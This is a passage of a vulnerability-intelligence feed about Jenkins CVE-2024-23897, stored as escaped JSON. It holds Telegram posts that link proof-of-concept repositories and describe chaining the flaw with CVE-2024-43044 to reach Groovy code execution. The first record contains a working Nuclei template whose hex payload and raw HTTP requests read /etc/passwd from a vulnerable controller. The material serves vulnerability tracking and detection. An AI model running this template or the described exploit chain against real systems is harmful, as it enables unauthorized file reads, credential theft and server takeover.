\u043d\u0430 \u0447\u0435\u043c \ud83d\ude22\n\nid: CVE-2024-23897\n\ninfo:\n  name: Jenkins < 2.441 - Arbitrary File Read\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.\n  reference:\n    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314\n  tags: cve,cve2024,lfi,rce,jenkins\n\nvariables:\n  payload: \"{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}\"\n\njavascript:\n  - code: |\n      let m = require('nuclei/net');\n      let name=(Host.includes(':') ? Host : Host+\":80\");\n      let conn,conn2;\n      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}\n      conn.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: download\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 0\\r\\n\\r\\n');\n      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}\n      conn2.Send('POST /cli?remoting=false HTTP/1.1\\r\\nHost:'+Host+'\\r\\nContent-type: application/octet-stream\\r\\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\\r\\nSide: upload\\r\\nConnection: keep-alive\\r\\nContent-Length: 163\\r\\n\\r\\n'+Body)\n      resp = conn.RecvString(1000)\n    args:\n      Body: \"{{payload}}\"\n      Host: \"{{Hostname}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(response, \"No such agent \\\"\")'\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T11:17:31.000000Z"}, {"uuid": "9c7433e5-4ddb-4a47-b991-57e551c00ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6518", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 - Jenkins \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 \u5229\u7528\u5de5\u5177\nURL\uff1ahttps://github.com/wjlin0/fictional-engine\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-27T19:31:09.000000Z"}, {"uuid": "b1086498-1257-4bf5-9b8b-514f1355c7cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/417", "content": "#cve #exploit #poc\n\nJenkins RCE Arbitrary File Read CVE-2024-23897\ud83d\udda5\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Jenkins, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c RCE \u0447\u0435\u0440\u0435\u0437 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043c\u043e\u0434\u0443\u043b\u0435  args4j\n\nPoC", "creation_timestamp": "2024-01-27T08:09:00.000000Z"}, {"uuid": "e98b9953-0d6a-4034-8eda-24c80d436d3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/285", "content": "CVE-2024-43044: From file read to RCE in Jenkins\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-43044 (\u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e CVSS=8.8) Path Traversal, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Jenkins.\n\n\u0421\u0443\u0442\u044c \u0431\u0430\u0433\u0438 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0430\u0433\u0435\u043d\u0442 \u043c\u043e\u0436\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e Path Traversal \u0432 ClassLoaderProxy#fetchJar \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Remoting/Hudson library, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 jar \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u043d\u0430 \u0430\u0433\u0435\u043d\u0442\u044b.\n\n\u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0447\u0442\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c CVE-2024-23897, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435 \"Remember me\" cookie \u0434\u043b\u044f \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0441\u043e\u043b\u044c Groovy (Jenkins Scripting Engine).\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0438\u043c\u0435\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0435\u0436\u0438\u043c\u043e\u0432 \u0440\u0430\u0431\u043e\u0442\u044b \u0434\u043b\u044f Inbound (JNLP) \u0438\u043b\u0438 SSH \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0430\u0433\u0435\u043d\u0442\u043e\u0432 \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0445\u044d\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 John The Ripper\ud83d\ude0e\n\u0422\u0430\u043a\u0438\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043e\u0442\u043b\u043e\u043c\u0430\u0432 \u0442\u0430\u0447\u043a\u0443 \u0441 \u0430\u0433\u0435\u043d\u0442\u043e\u043c, \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0440\u0430\u0437\u0432\u0438\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 Jenkins \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0435 \u0442\u0430\u0447\u043a\u0438 \u0441 \u0430\u0433\u0435\u043d\u0442\u0430\u043c\u0438.\n\n\u2699\ufe0f POC: https://github.com/convisolabs/CVE-2024-43044-jenkins\n\ud83e\udeb2 \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e: Jenkins \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Jenkins 2.471 \u0438 LTS 2.452.4, LTS 2.462.1\n\u2705 \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 32.471 \u0438 LTS 2.452.4, LTS 2.462.1", "creation_timestamp": "2024-09-02T07:27:44.000000Z"}, {"uuid": "004a7723-224d-4fd7-b591-5ee00ae6ea12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "Telegram/7VfoSTl9lrqKnS4Ll19JsrTAPUjyCLeONHG_LKCF_k7p9w", "content": "", "creation_timestamp": "2024-08-20T09:33:53.000000Z"}, {"uuid": "dd362dd6-382a-4167-8fff-3de8c4b55b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/656", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 exploit script\nURL\uff1ahttps://github.com/cc3305/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-29T13:12:36.000000Z"}, {"uuid": "8398ec44-747f-42cf-8726-955d599c4834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/kasperskyb2b/1125", "content": "\u041d\u0435\u0434\u0435\u043b\u044c\u043a\u0430 \u0432\u044b\u0434\u0430\u043b\u0430\u0441\u044c \u0442\u0430\u043a\u0430\u044f, \u0447\u0442\u043e \u043f\u043e\u0442 \u0431\u0443\u0434\u0435\u0442 \u0442\u0435\u0447\u044c \u0435\u0449\u0451 \u043c\u0435\u0441\u044f\u0446 \ud83d\uddff\n\n4\ufe0f\u20e3 \u0427\u0435\u0442\u044b\u0440\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 runc \u0438 BuildKit \u043f\u0440\u0438\u043d\u0435\u0441\u0443\u0442 \u043c\u043d\u043e\u0433\u043e \u0433\u043e\u043b\u043e\u0432\u043d\u043e\u0439 \u0431\u043e\u043b\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0430 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0445 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440, \u043e \u0447\u0451\u043c \u043c\u044b \u0443\u0436\u0435 \u043f\u0438\u0441\u0430\u043b\u0438.\n\n\u2699\ufe0f \u0410 \u0435\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0435\u0449\u0451 \u0438 GitLab, \u0442\u043e \u0437\u0430\u043e\u0434\u043d\u043e \u043f\u0440\u0438\u0434\u0451\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u0438 \u0435\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u043a\u0440\u044b\u0442\u044c CVE-2024-0402 \u0441\u043e \u0441\u043a\u0440\u043e\u043c\u043d\u044b\u043c CVSS 9.9. \u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043a\u0430\u043a Community, \u0442\u0430\u043a \u0438 Enterprise edition.\n\n\ud83d\ude0a \u041d\u0443 \u0438 \u0447\u0442\u043e\u0431\u044b \u043e\u043a\u043e\u043d\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u0431\u0438\u0442\u044c \u0434\u0435\u0432\u043e\u043f\u0441\u043e\u0432, \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u043f\u043e\u043b\u0442\u043e\u0440\u044b \u043d\u0435\u0434\u0435\u043b\u0438 \u043d\u0430\u0437\u0430\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Jenkins (CVE-2024-23897, CVSS 7.5), \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0438 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u044b \u043f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\ud83d\udd0e \u0410\u0432\u0442\u043e\u0440\u044b Anydesk, \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u0440\u0438\u0437\u043d\u0430\u043b\u0438\u0441\u044c, \u0447\u0442\u043e \u0441\u0442\u0430\u043b\u0438 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043c\u0430\u043b\u043e, \u043d\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0430 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0430\u044f \u2014 \u0432\u044b\u0437\u0432\u0430\u043b\u0438 \u043a\u0430\u0432\u0430\u043b\u0435\u0440\u0438\u044e \u041a\u0440\u0430\u0443\u0434\u0441\u0442\u0440\u0430\u0439\u043a, \u043f\u043e\u043c\u0435\u043d\u044f\u043b\u0438 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b. \u041a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0443\u0441\u043f\u043e\u043a\u0430\u0438\u0432\u0430\u044e\u0442 \u043f\u0440\u043e\u0441\u0442\u043e\u0434\u0443\u0448\u043d\u043e: \u00ab\u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c, \u0447\u0442\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u043f\u043e\u0434 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0435\u043c \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c AnyDesk \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e. \u0423\u0431\u0435\u0434\u0438\u0442\u0435\u0441\u044c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 \u0441\u0432\u0435\u0436\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0441 \u043d\u043e\u0432\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u043f\u043e\u0434\u043f\u0438\u0441\u0438 \u043a\u043e\u0434\u0430\u00bb. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u041f\u041e \u044d\u0442\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430, \u043a\u0430\u043a \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0442\u0430\u043a \u0438 \u043e\u0431\u044b\u0447\u043d\u043e\u0435, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c\u0430\u0445, \u043d\u0438\u0447\u0435\u0433\u043e \u0445\u043e\u0440\u043e\u0448\u0435\u0433\u043e \u0436\u0434\u0430\u0442\u044c \u043d\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f.\n\n\ud83d\udc6e\u200d\u2640\ufe0f \u0421\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0441 \u0437\u0438\u0440\u043e\u0434\u0435\u044f\u043c\u0438 \u0432 VPN-\u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Ivanti (Connect Secure \u0438 Policy Secure)   \u043d\u0430\u043a\u0430\u043b\u0438\u043b\u0430\u0441\u044c \u0434\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438, \u0447\u0442\u043e \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0430\u044f CISA \u0432\u0435\u043b\u0435\u043b\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0432\u0443\u0445 \u0434\u043d\u0435\u0439. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u0441\u0430\u043c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u043e\u043b\u043d\u044b\u0439 \u0441\u0431\u0440\u043e\u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0441 \u043d\u0430\u043a\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435\u043c \u0437\u0430\u0432\u043e\u0434\u0441\u043a\u0438\u0445 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a. \u041a \u0441\u0447\u0430\u0441\u0442\u044c\u044e, \u0432 \u043d\u0430\u0448\u0438\u0445 \u0448\u0438\u0440\u043e\u0442\u0430\u0445 \u044d\u0442\u043e \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0435 \u0438\u0437\u0434\u0435\u043b\u0438\u0435 Ivanti \u043f\u043e\u0447\u0442\u0438 \u043d\u0435  \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f (\u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 MobileIron, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0440\u0430\u0437 \u0434\u044b\u0440\u044b \u043b\u0430\u0442\u0430\u043b\u0438 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435).\n\n\ud83d\udee1 Cloudflare \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432\u044b\u0439 \u043e\u0442\u0447\u0451\u0442 \u043e\u0431 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0435, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u043c \u0432 \u043d\u043e\u044f\u0431\u0440\u0435 2023 \u0433\u043e\u0434\u0430. \u041f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u043e\u043a\u0442\u044f\u0431\u0440\u044c\u0441\u043a\u0438\u043c \u0432\u0437\u043b\u043e\u043c\u043e\u043c Okta, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u0443\u0442\u044c \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 Cloudflare \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0438\u0445 Confluence, Jira \u0438 Bitbucket. \u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0430\u0432\u0442\u043e\u0440\u043e\u0432 \u043e\u0442\u0447\u0451\u0442\u0430, zero-trust \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0430 \u0438 \u043e\u0431\u0449\u0438\u0439 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441 \u043c\u0435\u0440 \u0418\u0411 \u043f\u043e\u043c\u0435\u0448\u0430\u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0433\u043b\u0443\u0431\u0436\u0435 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043f\u043e\u0445\u0438\u0442\u0438\u0442\u044c \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u043b\u0438 \u0432\u043d\u0435\u0441\u0442\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0441\u0435\u0442\u0438. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u044d\u0442\u043e, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0442\u0440\u0430\u0442\u0438\u043b\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 3 \u043c\u0435\u0441\u044f\u0446\u0430 \u043d\u0430 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0439 \u0445\u0430\u0440\u0434\u0435\u043d\u0438\u043d\u0433, \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0441\u0435\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438 \u0437\u0430\u043c\u0435\u043d\u0443 \u0432\u0441\u0435\u0445 \u0441\u0435\u043a\u0440\u0435\u0442\u043e\u0432 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u0411\u0443\u0434\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c.\n\n\ud83e\udd14 \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u043a\u0442\u043e-\u0442\u043e \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u043d\u0430 Github \u0442\u043e\u043d\u043d\u044b \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 Binance, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0435 \u043a\u043e\u0434\u044b, \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u043c\u043d\u043e\u0433\u043e\u0435 \u0434\u0440\u0443\u0433\u043e\u0435.  \u041e\u043d\u043e \u043b\u0435\u0436\u0430\u043b\u043e \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u0438 Binance \u0441\u043c\u043e\u0433\u043b\u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043f\u0438\u0440\u0430\u0439\u0442\u043d\u0443\u044e \u0436\u0430\u043b\u043e\u0431\u0443. \u041a\u0442\u043e \u0437\u0430 \u044d\u0442\u043e \u0432\u0440\u0435\u043c\u044f \u0435\u0451 \u0441\u043a\u0430\u0447\u0430\u043b, \u0438 \u043a\u0430\u043a \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u2014 \u0443\u0437\u043d\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u0433\u043e\u0434\u0438\u043a, \u043d\u043e \u0442\u0435\u043c, \u0443 \u043a\u043e\u0433\u043e \u0432 Binance \u043b\u0435\u0436\u0430\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0430\u043a\u0442\u0438\u0432\u044b, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0437\u0430\u0445\u043e\u0447\u0435\u0442\u0441\u044f \u0438\u0445 \u043f\u0435\u0440\u0435\u043b\u043e\u0436\u0438\u0442\u044c \u043f\u043e\u0440\u0430\u043d\u044c\u0448\u0435. \ud83e\udd2a\n\n\ud83d\udc68\u200d\ud83d\udcbb \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0434\u043b\u044f \u0443\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u0438\u044f \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c 